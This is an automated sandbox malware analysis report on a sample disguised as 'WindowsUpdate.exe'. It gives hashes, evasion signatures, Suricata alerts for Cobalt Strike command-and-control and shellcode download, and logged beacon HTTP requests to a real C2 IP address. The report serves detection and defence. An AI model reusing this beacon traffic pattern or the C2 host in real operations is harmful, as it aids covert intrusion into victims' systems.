Windows Analysis Report
WindowsUpdate.exe

Overview

General Information

Sample name: WindowsUpdate.exe
Analysis ID: 1577955
MD5: 375049ae392572882d3402d0678389ef
SHA1: a3534e4451f28d4162e2d39dd70ef7b4496d4807
SHA256: 7d598c046110849932052e38c67071473753e809cb5d55d2223226e810b1475a
Tags: exe, user-smica83

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Program does not show much activity (idle)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WindowsUpdate.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\WindowsUpdate.exe" MD5: 375049AE392572882D3402D0678389EF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-18T22:52:03.210751+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:07.200084+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:14.771106+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:21.964454+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:29.287463+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:36.776166+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:44.382950+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:51.956452+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:52:59.510929+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:06.936853+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49763 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:14.336190+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49779 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:21.968112+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49799 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:29.435887+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49816 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:36.668368+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49835 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:43.978487+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49853 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:51.218394+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49869 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:53:58.505604+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49886 | 146.56.219.146 | 443 | TCP |
| 2024-12-18T22:54:05.618971+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49905 | 146.56.219.146 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-18T22:52:07.947770+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49732 | TCP |
| 2024-12-18T22:52:15.525510+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49733 | TCP |
| 2024-12-18T22:52:22.696537+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49736 | TCP |
| 2024-12-18T22:52:30.023519+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49741 | TCP |
| 2024-12-18T22:52:37.532557+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49742 | TCP |
| 2024-12-18T22:52:45.142764+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49743 | TCP |
| 2024-12-18T22:52:52.708825+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49744 | TCP |
| 2024-12-18T22:53:00.248345+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49746 | TCP |
| 2024-12-18T22:53:07.673380+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49763 | TCP |
| 2024-12-18T22:53:15.082077+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49779 | TCP |
| 2024-12-18T22:53:22.780642+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49799 | TCP |
| 2024-12-18T22:53:30.195703+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49816 | TCP |
| 2024-12-18T22:53:37.399876+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49835 | TCP |
| 2024-12-18T22:53:44.714622+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49853 | TCP |
| 2024-12-18T22:53:51.994563+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49869 | TCP |
| 2024-12-18T22:53:59.239615+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 146.56.219.146 | 443 | 192.168.2.4 | 49886 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-18T22:52:04.652742+0100 | 2035442 | 1 | A Network Trojan was detected | 146.56.219.146 | 443 | 192.168.2.4 | 49731 | TCP |

AV Detection

Source: WindowsUpdate.exe | ReversingLabs: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.0% probability
Source: WindowsUpdate.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknown | HTTPS traffic detected: 146.56.219.146:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: WindowsUpdate.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\admin\Desktop\Ulfberht-main\Ulfberht-main\src\x64\Release\Ulfberht.pdb source: WindowsUpdate.exe
Source: Binary string: C:\Users\admin\Desktop\Ulfberht-main\Ulfberht-main\src\x64\Release\Ulfberht.pdb## source: WindowsUpdate.exe
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Code function: 4x nop then xor eax, eax 0_2_00000217700B0B84

Networking

Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49744
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49733
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49736
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49732
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49742
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49763
Source: Network traffic | Suricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 146.56.219.146:443 -> 192.168.2.4:49731
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49746
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49816
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49779
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49799
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49741
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49886
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49835
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49743
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49853
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49869
Source: Joe Sandbox View | ASN Name: CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49733 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49732 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49736 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49779 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49799 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49835 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49816 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49853 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49869 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49886 -> 146.56.219.146:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49905 -> 146.56.219.146:443
Source: global traffic | HTTP traffic detected:
    GET /res/js/jquery-3.6.2.slim.min.js HTTP/1.1
    Accept: */*
    Content-Language: de-DE, en-CA
    User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Host: 146.56.219.146
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /assets/code-3d7b701fc6eb.css HTTP/1.1
    Accept: */*
    Content-Language: de-DE, en-CA
    Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
    User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Host: 146.56.219.146
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 146.56.219.146
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/#
Source: WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/0Z
Source: WindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.css
Source: WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.cssC4
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977365661.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977631752.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977511740.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css
Source: WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd06
Source: WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770042000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd06F
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css2J
Source: WindowsUpdate.exe, 00000000.00000003.2204758414.0000021770044000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css3A
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css6J
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css:
Source: WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssC4
Source: WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssJ4
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssJJ
Source: WindowsUpdate.exe, 00000000.00000003.1832387451.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssZ-
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssf4
Source: WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770042000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssgA
Source: WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssq4
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssr
Source: WindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssr3A
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssrgA
Source: WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977631752.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977511740.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977365661.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204758414.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssvJ
Source: WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssz
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css~J
Source: WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/fJ
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/g
Source: WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/p
